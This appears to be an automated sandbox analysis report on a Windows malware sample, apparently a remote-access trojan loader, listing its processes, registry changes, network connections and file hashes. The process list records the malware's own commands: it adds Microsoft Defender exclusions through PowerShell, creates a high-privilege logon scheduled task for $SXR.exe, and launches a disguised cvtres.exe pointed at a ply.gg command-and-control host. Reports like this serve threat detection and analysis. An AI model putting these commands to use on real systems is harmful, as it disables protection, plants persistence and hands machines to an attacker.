| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cvtresa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jv2quekv\jv2quekv.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FB6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF4054A7BE4EAAB2A1A424454987B.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp64A5.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| N/A | 127.0.0.1:52724 | tcp | |
| N/A | 127.0.0.1:52726 | tcp | |
| N/A | 127.0.0.1:52753 | tcp | |
| N/A | 127.0.0.1:52755 | tcp | |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | a9696c84d1bc8731fda72d5073f0cfe3 |
| SHA1 | c364c3a16ee68efb9b9a91e6ed51cd0bdf9af45a |
| SHA256 | dd576bb7be7807a85506c5687a7a34726abbb16e5324dc614210ec3abb1ff14b |
| SHA512 | 956709deead60d1517f23de733822c359b646155f7d32e0750414c0e6160096793c1020b9d1fb6b7775208cd0b112ccb03128a5d1c4c4b354bbd7860063c0ddf |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | b2b2b57ca9369e6fb4e56e0f70d27ae7 |
| SHA1 | b0bbfb9bcff02377c4872e375f92eb90ee70d1bb |
| SHA256 | edd756bb50845a45a58572e4a97c848e30e653c77c46e7fc4d19fbe49661c73a |
| SHA512 | 4a8ce4e58500279f15e2f9bb223ad1a43c80e4ed5a371f5384ede04b2d97cf2fbdc59bd3ba1dd90a1f48395ee24c031cdf12acae8cb9e00ef372cff9fbd06efc |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 1f566011af79c49ad069572fd8e38659 |
| SHA1 | 9ab4bf1ff80f7f05ee06e7a8620afe15fc1e28b2 |
| SHA256 | 324737f16b25440c052da199fca464909b30e4d4f5231605e56be36415e60804 |
| SHA512 | b99fbe4db54bae31443b242423e2b9fdbd22483896b1966a2d9059cac5493c88d7637cef6f6abf5e743dbad7b35dab4a49003542dd63737ecf6359f6a36758c2 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | b9bbe31d276de5c3d05352d070ae4244 |
| SHA1 | 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec |
| SHA256 | a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d |
| SHA512 | 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17 |
memory/4832-21-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/4832-20-0x0000000000F30000-0x0000000001570000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ceb8c3c0f2249f05f3df8f88d46ae743 |
| SHA1 | 651675ba157c085ce64aa5bb2abbfd6f5efc75c6 |
| SHA256 | a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778 |
| SHA512 | 872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
memory/4408-39-0x00007FF72E000000-0x00007FF72E43C000-memory.dmp
memory/4012-42-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/4012-43-0x0000000005610000-0x00000000056AC000-memory.dmp
memory/4012-41-0x0000000000D20000-0x0000000000DA2000-memory.dmp
memory/4012-44-0x00000000056B0000-0x0000000005742000-memory.dmp
memory/4012-45-0x00000000058E0000-0x00000000058F0000-memory.dmp
memory/4012-46-0x00000000072B0000-0x0000000007854000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jv2quekv\jv2quekv.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
\??\c:\Users\Admin\AppData\Local\Temp\jv2quekv\jv2quekv.cmdline
| MD5 | e4cd7ce07b61082f7d8a02617507f576 |
| SHA1 | faefb27ed2fdcf54595da4d0200ec5ca146f19da |
| SHA256 | 0171318c5655183fe70717944ef9b98f4b3897ef5f3b4e09ab49e1cec73e73ba |
| SHA512 | 20de0a1f8db0a1190b6d5205affa76f173fb9a570941f5c9db7cf0804526c0cea5b1440d5f22653d4ce6cd415abd0ef32ff7a1660ad4ad251ac24950d08d9119 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCF4054A7BE4EAAB2A1A424454987B.TMP
| MD5 | 6d4e315ddb659723cf270858a8023839 |
| SHA1 | 0df893c7f7f48483e29d8db81bfabc8456ba24a9 |
| SHA256 | f6528ea00f868ca00663e6aeff8def75c2db4a0b7012d9836f9267679b0e47f0 |
| SHA512 | 70a5bb19c9384117a21eeb1ce2e44ffc055dbf5ff958e0b912823c353a283606bafb1b7d7a5c942ffe8ecd3890c88b88597d027c19952156fe959962422339a6 |
C:\Users\Admin\AppData\Local\Temp\RES4FB6.tmp
| MD5 | 974f32d503b080e946b11b010bb0fbe8 |
| SHA1 | a383e7b75813c9c48ce5c20f83a964632ac2fdea |
| SHA256 | 41c3c5b78fb1fc226456922b272d4d19f96179f502ff32d849d3c9e2e2bf3c77 |
| SHA512 | 67082ff70e9e3a3069444df0e31c91f014d048149cd13301a7a4d87faa668fd862474e42bc110a4995b82bfeb477d5ebdf0cf8441d7d40c2c82b48f3cbc597ae |
memory/564-59-0x0000000000400000-0x0000000000424000-memory.dmp
memory/564-60-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/564-61-0x00000000056E0000-0x00000000056F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
| MD5 | d9abea11e4ca44b79f44223c859ed3db |
| SHA1 | 034ccdf6bd2a2163b794f0d5107401cc3f09b7bd |
| SHA256 | 016b291c4fea02eadb9998edd42f61f6fbbccdf6e115f810c822bdbaeecc5605 |
| SHA512 | 5f3317fdf82f305e1a5e64064b1306b007b5208bacfaf8a07c04ff76f77c7c317447503e5ec80871c10652bc6925bad1f0a8bb19b4b5e7ad019b250b4dd53155 |
memory/2904-65-0x0000000000390000-0x0000000000398000-memory.dmp
memory/4012-68-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/2904-67-0x00007FFB109D0000-0x00007FFB11491000-memory.dmp
memory/1948-70-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/1948-69-0x0000000002C70000-0x0000000002CA6000-memory.dmp
memory/1948-71-0x0000000002C60000-0x0000000002C70000-memory.dmp
memory/4832-72-0x0000000003A30000-0x0000000003A40000-memory.dmp
memory/1948-73-0x0000000005680000-0x0000000005CA8000-memory.dmp
memory/4832-76-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/2904-77-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/4832-78-0x0000000005EC0000-0x0000000005EE2000-memory.dmp
memory/4408-79-0x00007FF72E000000-0x00007FF72E43C000-memory.dmp
memory/4040-82-0x0000000002AA0000-0x0000000002AB0000-memory.dmp
memory/4832-81-0x0000000005F60000-0x0000000005FC6000-memory.dmp
memory/4040-80-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/1948-83-0x0000000005DE0000-0x0000000005E02000-memory.dmp
memory/1948-89-0x0000000005E80000-0x0000000005EE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r0kuw1nu.ir4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1948-94-0x0000000006170000-0x00000000064C4000-memory.dmp
memory/1948-104-0x0000000006560000-0x000000000657E000-memory.dmp
memory/1948-105-0x00000000065B0000-0x00000000065FC000-memory.dmp
memory/4832-112-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/1948-114-0x000000007F6B0000-0x000000007F6C0000-memory.dmp
memory/1948-113-0x00000000074F0000-0x0000000007522000-memory.dmp
memory/1948-115-0x000000006F700000-0x000000006F74C000-memory.dmp
memory/1948-125-0x00000000074B0000-0x00000000074CE000-memory.dmp
memory/564-126-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/1948-128-0x0000000007530000-0x00000000075D3000-memory.dmp
memory/1948-127-0x0000000002C60000-0x0000000002C70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp64A5.tmp.bat
| MD5 | c8b06d91aba6188373ff66ae5330844b |
| SHA1 | 5d2b36f4fa69f3e0431a817c1e8361b8a20c007d |
| SHA256 | 92d2c1e004516e6fddb397163c259c6c96f841cc9b08b619fcfe1b7d94432811 |
| SHA512 | 6866ba015eba01056851d958b36cb560f9a597d48bfd662f6688af7c60acb96c48eaf347c9d5d1ee643c0f4a2a6f57f8057da812040507c4c2d66968235e4945 |
memory/1948-131-0x0000000007ED0000-0x000000000854A000-memory.dmp
memory/1948-141-0x0000000007890000-0x00000000078AA000-memory.dmp
memory/564-142-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/4040-130-0x000000006F700000-0x000000006F74C000-memory.dmp
memory/2904-143-0x00007FFB109D0000-0x00007FFB11491000-memory.dmp
memory/4040-144-0x0000000002AA0000-0x0000000002AB0000-memory.dmp
memory/1948-145-0x0000000007910000-0x000000000791A000-memory.dmp
memory/1948-146-0x0000000007B00000-0x0000000007B96000-memory.dmp
memory/1948-147-0x0000000007A90000-0x0000000007AA1000-memory.dmp
memory/1948-148-0x0000000007AC0000-0x0000000007ACE000-memory.dmp
memory/1948-149-0x0000000007AD0000-0x0000000007AE4000-memory.dmp
memory/1948-150-0x0000000007BC0000-0x0000000007BDA000-memory.dmp
memory/1948-151-0x0000000007BB0000-0x0000000007BB8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/1948-157-0x0000000073530000-0x0000000073CE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ced19369ea4a0b5feadd46d37f7a4c71 |
| SHA1 | 2e69ac08d2b419103133fdd891fccc19bb8ecc40 |
| SHA256 | f2c2834fd090c29a20f12a8be15ee62a07d8d56a3d2817106576ff07514f8cac |
| SHA512 | ff216106de8faa7662b1d483efd627c9f1615f535b4b38f2caa008e02492656fb41189f198bc428245cd6b17c6d484a3ff84a3e4ca02286ec9a694215cada54f |
memory/4040-158-0x0000000073530000-0x0000000073CE0000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | c1448f713b4e556845610a35dd347814 |
| SHA1 | 5db8bc7f6738bade35e067452d1aef73ce206e7e |
| SHA256 | 3f14d78b151c8371363fd7dc5bdd55de9ac1261f31ede178cb07e86949f76086 |
| SHA512 | e9c27c0e6e45beb45411c35efef933bc7b0ad0367c8e102d78accf72e4b61e33a5dff60edcfe4dc55e5074a75aa97a02553aafc422eda87225de3ae186bda19c |
memory/1180-162-0x0000000073530000-0x0000000073CE0000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | e8e4214bdbf6c3dfc34cb6721f4ecd69 |
| SHA1 | bbad2e21a95765d592712aed57ab59d7be128c84 |
| SHA256 | cb7b482025d45a7f476013867793e1341f9f59da2e5ab0dd6c66b205b8a96d3f |
| SHA512 | 863e3b5f0e8014b72f191d34d73ad6ef75c6944bb08d330dcece1b3262bd67f426274aff555c67c06c88f3122b4d304ff83be4eb42da6e8f165fecab404b8a93 |
memory/2232-164-0x0000000002E20000-0x0000000002E21000-memory.dmp
memory/2976-170-0x0000022A098A0000-0x0000022A098C0000-memory.dmp
memory/2976-172-0x0000022A09860000-0x0000022A09880000-memory.dmp
